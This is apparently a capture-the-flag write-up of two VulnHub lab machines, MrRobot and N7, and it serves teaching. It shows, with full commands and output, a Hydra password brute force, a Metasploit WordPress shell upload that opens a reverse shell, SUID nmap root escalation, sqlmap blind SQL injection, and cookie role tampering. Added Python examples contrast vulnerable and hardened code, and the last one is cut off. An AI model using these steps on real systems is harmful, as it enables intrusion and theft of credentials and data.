VulnHub

MrRobot

Level: Easy | OS: Linux

Date release: 28 Jun 2016

Author: Leon Johnson

Enumeration [1st Flag]

The assessment began with a network-wide Nmap scan to discover active hosts within the environment:

┌──(Kali@Kali)-[~/MrRobot]
└─$ sudo nmap -T4 192.168.68.0/24 -sV

Since the target is running in a virtualized environment, I identified 192.168.68.101 as the correct host by observing the MAC Address vendor prefix.
With the target confirmed, the scan further revealed the following active services:

Navigating to the Apache HTTP server through BurpSuite [to record all traffic] revealed an immersive, stylized web interface.
The site greeted me with a series of terminal-style animations simulating a system boot sequence.
Once complete, I was presented with a mock web shell that accepted a limited set of six specific commands, setting the thematic tone for the Mr. Robot challenge:

A manual check of robots.txt yielded two significant discoveries: a wordlist named fsocity.dic and the first objective, key-1-of-3.txt:

First flag key-1-of-3.txt: 073403c8a58a1f80d943455fb30724b9

fsocity.dic wordlist:

I downloaded the wordlist locally for further analysis:

┌──(Kali@Kali)-[~/MrRobot]
└─$ curl http://192.168.68.101/fsocity.dic >> fsocity.txt
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
100  6.90M 100  6.90M   0      0 83.54M      0                              0

After sorting the list and removing duplicates, I narrowed the wordlist down to 11,451 unique words and saved the content into a new file:

┌──(Kali@Kali)-[~/MrRobot]
└─$ sort fsocity.txt | uniq | wc -l
11451
sort fsocity.txt | uniq >> uniq.txt

With manual enumeration complete, I leveraged Nikto to scan for common web vulnerabilities and misconfigurations.
The scan identified a WordPress installation, providing a clear attack vector for the next phase:

┌──(Kali@Kali)-[~/MrRobot]
└─$ nikto -h 192.168.68.101:80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.68.101
+ Target Hostname:    192.168.68.101
+ Target Port:        80
+ Start Time:         2026-01-29 06:11:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /mJa3BMQO.php_bak: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /admin/: This might be interesting.
+ /readme: This might be interesting.
+ /image/: Drupal Link header found with value: <http://192.168.68.101/?p=23>; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2026-01-29 06:13:07 (GMT-5) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Navigating to /wp-login.php, I began probing the authentication mechanism.
Initial testing with a generic username yielded the standard "invalid username" response.

However, attempting to authenticate as "elliot" [inspired by the machine's theme] produced a different error message,
confirming this as a valid username on the system:

With a valid username identified, I proceeded to brute-force the password using Hydra and the optimized wordlist from earlier:

┌──(Kali@Kali)-[~/MrRobot]
└─$ hydra -V -l elliot -P uniq.txt 192.168.68.101 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-29 07:27:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:1/p:11452), ~716 tries per task
[DATA] attacking http-post-form://192.168.68.101:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "000" - 1 of 11452 [child 0] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "000000" - 2 of 11452 [child 1] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "000080" - 3 of 11452 [child 2] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "001" - 4 of 11452 [child 3] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "002" - 5 of 11452 [child 4] (0/0)
[ATTEMPT] target 192.168.68.101 - login "elliot" - pass "003" - 6 of 11452 [child 5] (0/0)
...
...
...
[80][http-post-form] host: 192.168.68.101   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found

Upon successful authentication, I was redirected to the /wp-admin/ dashboard, confirming that the compromised account possessed administrative privileges:

Exploitation [2nd Flag]

I launched Metasploit via msfconsole and searched for the keywords wordpress admin shell upload:

┌──(Kali@Kali)-[~/MrRobot]
└─$ msfconsole
Metasploit tip: Organize your work by creating workspaces with workspace -a <name>

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             https://metasploit.com


       =[ metasploit v6.4.110-dev                               ]
+ -- --=[ 2,601 exploits - 1,322 auxiliary - 1,707 payloads     ]
+ -- --=[ 431 post - 49 encoders - 14 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

msf > search wordpress admin shell upload

Matching Modules
================

   #   Name                                                    Disclosure Date  Rank       Check  Description
   -   ----                                                    ---------------  ----       -----  -----------
   0   exploit/multi/http/wp_acf_extended_rce                  2025-12-02       excellent  Yes    WordPress ACF Extended Unauthenticated RCE via prepare_form()
   1     \_ target: PHP In-Memory                              .                .          .      .
   2     \_ target: Unix/Linux Command Shell                   .                .          .      .
   3     \_ target: Windows Command Shell                      .                .          .      .
   4   exploit/multi/http/wp_ai_engine_mcp_rce                 2025-11-04       excellent  Yes    WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE
   5     \_ target: PHP In-Memory                              .                .          .      .
   6     \_ target: Unix/Linux Command Shell                   .                .          .      .
   7     \_ target: Windows Command Shell                      .                .          .      .
   8   exploit/unix/webapp/wp_admin_shell_upload               2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   9   exploit/multi/http/wp_king_addons_privilege_escalation  2025-10-30       excellent  Yes    WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE
   10    \_ target: PHP In-Memory                              .                .          .      .
   11    \_ target: Unix/Linux Command Shell                   .                .          .      .
   12    \_ target: Windows Command Shell                      .                .          .      .
   13  exploit/multi/http/wp_automatic_sqli_to_rce             2024-03-13       excellent  Yes    WordPress wp-automatic Plugin SQLi Admin Creation
   14    \_ target: PHP In-Memory                              .                .          .      .
   15    \_ target: Unix/Linux Command Shell                   .                .          .      .
   16    \_ target: Windows Command Shell                      .                .          .      .

From the description, option 8 is exactly what we're looking for: WordPress Admin Shell Upload.

msf > use 8
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.68.107   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

I configured the relevant options and attempted to run the exploit:

msf exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME elliot
USERNAME => elliot
msf exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD ER28-0652
PASSWORD => ER28-0652
msf exploit(unix/webapp/wp_admin_shell_upload) > set RHOST 192.168.68.101
RHOST => 192.168.68.101
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.68.107:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.

The initial exploit attempt failed because Metasploit's WordPress detection mechanism did not identify the target properly.
After reviewing the advanced options, I disabled the WordPress check and the payload deployed successfully:

msf exploit(unix/webapp/wp_admin_shell_upload) > set WPCHECK false
WPCHECK => false
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.68.107:4444
[*] Authenticating with WordPress using elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/jMutSdmAbI/XRbLCFOFnB.php...
[*] Sending stage (42137 bytes) to 192.168.68.101
[*] Meterpreter session 1 opened (192.168.68.107:4444 -> 192.168.68.101:49154) at 2026-01-29 06:15:42 -0500
[!] This exploit may require manual cleanup of 'XRbLCFOFnB.php' on the target
[!] This exploit may require manual cleanup of 'jMutSdmAbI.php' on the target
[!] This exploit may require manual cleanup of '../jMutSdmAbI' on the target

meterpreter > shell
Process 1843 created.
Channel 0 created.

I upgraded the shell to an interactive tty and a more stable bash session:

python3 -c 'import pty; pty.spawn("/bin/bash")'
< ps/wordpress/htdocs/wp-content/plugins/jMutSdmAbI$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
< ps/wordpress/htdocs/wp-content/plugins/jMutSdmAbI$ cd /
daemon@linux:/$

We can see that we're logged in as the user daemon. After looking around a bit, we find /home/robot, which seems to contain interesting material:

daemon@linux:/$ cd /home/robot
cd /home/robot
daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Initial attempts to read key-2-of-3.txt resulted in permission errors, since the file is owned by the robot user.
However, the password.raw-md5 file contained an unsalted MD5 hash that could be cracked using John:

┌──(Kali@Kali)-[~/MrRobot]
└─$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (?)
1g 0:00:00:00 DONE (2026-01-29 06:17) 10.00g/s 407040p/s 407040c/s 407040C/s bonjour1..teletubbies
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

With the credentials recovered, I switched to the robot user:

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$

This granted access to the second flag:

robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Privilege Escalation [3rd Flag]

While exploring the system, I searched for SUID binaries: executables that run with the privileges of their owner rather than those of the user executing them:

robot@linux:~$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Analysis revealed that the nmap binary had the SUID bit set and was owned by root, a significant security misconfiguration.
Starting nmap interactively revealed that it is an old version (3.81) that is known to be vulnerable to privilege escalation:

robot@linux:~$ nmap --interactive
nmap --interactive
    
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap>

Inspection of the help menu reveals that nmap can execute shell commands.
Running the whoami command confirmed execution with root privileges:

nmap> h
h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish.  Results are printed to the
screen (of course you can still use file output commands).
! <command>   -- runs shell command given in the foreground
x             -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen).  You should generally specify a
file for results (with -oX, -oG, or -oN).  If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings.  If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h          -- Obtain help with Nmap syntax
h             -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
nmap> !whoami
!whoami
root
waiting to reap child : No child processes

This meant I could leverage nmap to spawn a root shell and find the last flag:

nmap> !sh
!sh
# cd /root
cd /root
# ls
ls
firstboot_done  key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Web Machine: (N7)

Level: Medium | OS: Linux

Date release: 3 Nov 2021

Author: Duty Mastr

Enumeration [1st Flag]

The assessment began with a network-wide Nmap scan to discover active hosts within the environment:

┌──(Kali@Kali)-[~/N7]
└─$ sudo nmap -T4 192.168.68.0/24 -sV

Since the target is running in a virtualized environment, I identified 192.168.68.115 as the correct host by observing the MAC Address vendor prefix.
The scan also revealed an Apache httpd server running on port 80:

Browsing to the website revealed an empty blog landing page:

Initial manual inspection yielded no hidden functionality or sensitive information.
To identify unlinked assets, I performed a directory brute-force attack using ffuf with the DirBuster-2007_directory-list-lowercase-2.3-medium.txt wordlist, targeting .php, .txt, and .html extensions:

┌──(Kali@Kali)-[~/N7]
└─$ ffuf -u http://192.168.68.115:80/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt -e .php,.txt,.html

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.68.115:80/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .php .txt .html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

profile.php             [Status: 200, Size: 1473, Words: 508, Lines: 44, Duration: 1ms]
index.html              [Status: 200, Size: 1620, Words: 536, Lines: 49, Duration: 85ms]
javascript              [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 1ms]
exploit.html            [Status: 200, Size: 279, Words: 37, Lines: 12, Duration: 1ms]
.html                   [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 1ms]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
                        [Status: 200, Size: 1620, Words: 536, Lines: 49, Duration: 5ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 6ms]
:: Progress: [830516/830516] :: Job [1/1] :: 7142 req/sec :: Duration: [0:01:36] :: Errors: 0 ::

The scan identified several active endpoints.
While profile.php and index.html appeared standard, the discovery of exploit.html stood out as a high-interest target for further investigation.
Browsing to the page revealed a file upload function:

Initial upload attempts failed with a "Failed to connect to localhost:80" error.
This indicated that while the front-end form existed, the back-end logic may have been broken or misconfigured.

Examination of the HTML source code via Browser Developer Tools revealed a critical misconfiguration in the file upload form.
The action attribute was hardcoded to point to localhost rather than the server's IP address, causing the request to fail:

To work around this locally and test the endpoint, I manually modified the DOM to point the form's action to the target's actual IP [192.168.68.115]:

After resubmitting the form with the corrected destination, the server processed the request and returned the first flag: FLAG{N7

Custom wordlist & SQLi [2nd Flag]

Standard enumeration using broad wordlists from /usr/share/seclists failed to identify any new points of entry.
Suspecting that the hidden endpoints might be related to the internal infrastructure, I created a custom wordlist.
I selected 15 networking-specific keywords and used them to generate two-word combinations for a more specialized fuzzing attempt:

To generate the targeted wordlist, I used a nested Bash loop to create every possible two-word combination from my list of 15 networking terms.
The loop joins the terms with both a hyphen (-) and an underscore (_) and skips pairs in which a word is combined with itself.
This produced a specialized dictionary of 420 unique permutations [calculated as $n \times (n-1) \times 2$], tailored to the environment's naming convention:

┌──(Kali@Kali)-[~/N7]
└─$ while read i; do while read j; do [ "$i" != "$j" ] && echo "${i}-${j}" && echo "${i}_${j}"; done < words.txt; done < words.txt > combined_wordlist.txt

The custom wordlist yielded a hit, uncovering the enter_network directory:

┌──(Kali@Kali)-[~/N7]
└─$ ffuf -u http://192.168.68.115:80/FUZZ -w /usr/share/seclists/Discovery/Web-Content/two-words.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.68.115:80/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/two-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

enter_network           [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 4583ms]
:: Progress: [420/420] :: Job [1/1] :: 43 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

Accessing the new endpoint revealed the existence of a login portal:

Inspection of the login POST request revealed three active parameters within the payload:

Armed with the request parameters, I fired up sqlmap to check for SQL injection.
I used the following command to automate the exploit:

┌──(Kali@Kali)-[~/N7]
└─$ sqlmap -u "http://192.168.68.115/enter_network/" --data="user=test&pass=pass&sub=SEND" -p user,pass --level 3 --batch --threads 5 --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.10#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:53:46 /2026-01-30/

[15:53:46] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('user=JGFyZ29uMmk...gwejJmcTlr;role=MjEyMzJmMjk...FmYzM%253D'). Do you want to use those [Y/n] Y
[15:53:46] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:53:46] [INFO] testing if the target URL content is stable
[15:53:47] [INFO] target URL content is stable
[15:53:47] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[15:53:47] [INFO] testing for SQL injection on POST parameter 'user'
...
...
...
[15:56:30] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[15:56:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:56:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:56:35] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:56:39] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:56:43] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:56:47] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:56:51] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 879 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=test' AND (SELECT 6961 FROM (SELECT(SLEEP(5)))CFsa)-- CoiA&pass=pass&sub=SEND
---
[15:57:25] [INFO] the back-end DBMS is MySQL
[15:57:25] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:57:31] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:57:31] [INFO] fetching current database
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[15:57:31] [INFO] retrieved:
[15:57:42] [INFO] adjusting time delay to 1 second due to good response times
Machine
[15:58:11] [INFO] fetching tables for database: 'Machine'
[15:58:11] [INFO] fetching number of tables for database 'Machine'
[15:58:11] [INFO] retrieved: 1
[15:58:13] [INFO] retrieved: login
[15:58:40] [INFO] fetching columns for table 'login' in database 'Machine'
[15:58:40] [INFO] retrieved: 3
[15:58:45] [INFO] retrieved: username
[15:59:19] [INFO] retrieved: password
[16:00:00] [INFO] retrieved: role
[16:00:22] [INFO] fetching entries for table 'login' in database 'Machine'
[16:00:22] [INFO] fetching number of entries for table 'login' in database 'Machine'
[16:00:22] [INFO] retrieved: 1
[16:00:25] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
admin
[16:00:56] [INFO] retrieved: FLAG{N7:KSA_01}
[16:02:16] [INFO] retrieved: administrator
Database: Machine
Table: login
[1 entry]
+--------+-----------------+---------------+
| role   | password        | username      |
+--------+-----------------+---------------+
| admin  | FLAG{N7:KSA_01} | administrator |
+--------+-----------------+---------------+

[16:03:14] [INFO] table 'Machine.login' dumped to CSV file '/home/naruto/.local/share/sqlmap/output/192.168.68.115/dump/Machine/login.csv'
[16:03:14] [INFO] fetched data logged to text files under '/home/naruto/.local/share/sqlmap/output/192.168.68.115'

[*] ending @ 16:03:14 /2026-01-30/

The SQL injection successfully dumped the login table from the Machine database, revealing our second flag: FLAG{N7:KSA_01}.
Despite acquiring valid credentials, attempting to log in with the user didn't yield any additional access or sensitive information:
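The injection sqlmap found, shown as an added example that is not part of the original write-up: a string-built login query beside its parameterized form, exercised with the exact payload from the sqlmap output above. It assumes SQLite standing in for the target's MariaDB (so the MySQL SLEEP() call surfaces as an error instead of a 5-second delay) and a constructed copy of the Machine.login table; the server-side code is hypothetical, not the machine's own.

```python
import sqlite3

# Constructed stand-in for the 'Machine.login' table the write-up dumped:
# the same three columns and the single row shown in the sqlmap output.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT, role TEXT)")
    conn.execute(
        "INSERT INTO login VALUES ('administrator', 'FLAG{N7:KSA_01}', 'admin')"
    )
    return conn


# The time-based payload sqlmap reported for the POST parameter 'user'.
SQLMAP_PAYLOAD = "test' AND (SELECT 6961 FROM (SELECT(SLEEP(5)))CFsa)-- CoiA"


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str):
    """String-built query (hypothetical): the user's input becomes SQL text,
    so a quote in 'user' closes the literal and the rest is executed."""
    sql = f"SELECT role FROM login WHERE username='{user}' AND password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, user: str, password: str):
    """Bound parameters: the same input is only ever compared as a value,
    never parsed, so the payload simply matches no username."""
    sql = "SELECT role FROM login WHERE username=? AND password=?"
    row = conn.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


def input_interpreted_as_sql(conn: sqlite3.Connection, user: str, password: str = "pass") -> bool:
    """Differential check: the parameterized query is the reference.  If the
    string-built query errors (SQLite has no SLEEP, so the MySQL payload fails
    at parse time) or returns a different row for the same input, the input
    was interpreted as SQL rather than as data."""
    reference = login_parameterized(conn, user, password)
    try:
        return login_vulnerable(conn, user, password) != reference
    except sqlite3.OperationalError:
        return True
```

On the real MariaDB target the same string-built query would not error but would pause for SLEEP(5), which is exactly the timing difference sqlmap measured to confirm the blind injection.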

Privilege Escalation via Cookie [3rd Flag]

With the credentials leading to a dead end, I shifted my focus toward the /enter_network/ directory.
I decided to fuzz this endpoint for hidden files or subdirectories using ffuf, targeting common extensions like .php, .txt, and .html:

┌──(Kali@Kali)-[~/N7]
└─$ ffuf -u http://192.168.68.115:80/enter_network/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt -e .php,.txt,.html

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.68.115:80/enter_network/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .php .txt .html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

admin.php               [Status: 200, Size: 126, Words: 15, Lines: 7, Duration: 3ms]
index.php               [Status: 200, Size: 324, Words: 42, Lines: 19, Duration: 283ms]
                        [Status: 200, Size: 324, Words: 42, Lines: 19, Duration: 1ms]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
.html                   [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 3ms]
:: Progress: [830516/830516] :: Job [1/1] :: 14285 req/sec :: Duration: [0:01:22] :: Errors: 0 ::

The ffuf scan successfully identified a new endpoint: /enter_network/admin.php.
Upon navigating to the page, I was greeted with a 'this interface is admin only' restriction:

Further investigation via Burp Suite highlighted the session cookies as a potential vulnerability.
Given the 'this interface is admin only' restriction encountered previously, the role cookie became the primary target for manipulation:

The structure hinted at URL encoding combined with Base64.
Decoding it using Burp’s Decoder tab and “smart decode” option revealed a string:

The decoded string matched the signature of an MD5 hash.
I submitted the hash to CrackStation for a lookup, which successfully returned the plaintext value: admin

I then manually changed the cookie value of the role parameter to admin, replacing the encoded hash with a plaintext string:

Refreshing the page to submit the new cookie reveals the final flag: KSA_01}
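The role cookie handling above, as an added example that is not taken from the write-up or from the machine's source: it reproduces the observed encoding (md5 hex digest, then base64, then URL-encoded twice, which matches the 'MjEyMzJmMjk...FmYzM%253D' value visible in the sqlmap output), a hypothetical reconstruction of the check that trusts the cookie, and an HMAC-signed replacement that a client cannot forge. The server key is constructed for the example.

```python
import base64
import hashlib
import hmac
import secrets
from urllib.parse import quote, unquote

# The md5 of "admin" that CrackStation resolved; its base64 form begins with
# 'MjEyMzJmMjk' and ends with 'MDFmYzM=', matching the cookie seen on the page.
ADMIN_MD5 = "21232f297a57a5a743894a0e4a801fc3"


def encode_role_cookie(role: str) -> str:
    """Reproduce the observed format: md5 hex digest -> base64 -> URL-encode twice."""
    digest = hashlib.md5(role.encode()).hexdigest()
    b64 = base64.b64encode(digest.encode()).decode()
    return quote(quote(b64, safe=""), safe="")


def decode_role_cookie(value: str) -> str:
    """Undo both URL-encodings and the base64 layer (what Burp's 'smart decode'
    did).  A value that is not base64, such as the plaintext 'admin' the
    write-up substituted, is returned unchanged."""
    raw = unquote(unquote(value))
    try:
        return base64.b64decode(raw, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return raw


def is_admin_vulnerable(role_cookie: str) -> bool:
    """Hypothetical reconstruction of the flawed check: the client-supplied
    cookie alone decides the role, so anyone who edits it becomes admin."""
    decoded = decode_role_cookie(role_cookie)
    return decoded in ("admin", ADMIN_MD5)


# Hardened variant: the role is bound to a server-held key with an HMAC, so a
# client that rewrites the role cannot produce a matching tag.
SERVER_KEY = secrets.token_bytes(32)  # constructed; load from protected config in practice


def issue_signed_role(role: str, key: bytes = SERVER_KEY) -> str:
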